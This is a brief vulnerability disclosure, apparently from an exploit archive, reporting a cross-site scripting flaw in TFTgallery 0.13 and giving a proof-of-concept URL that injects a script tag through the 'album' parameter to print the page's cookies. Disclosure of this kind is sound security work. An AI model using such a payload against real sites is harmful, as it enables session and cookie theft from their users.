TFTgallery 0.13 is vulnerable to XSSDiscovered by Blake
http://example.com/tftgallery/index.php?page=1&album=<script>document.write(document.cookie)</script>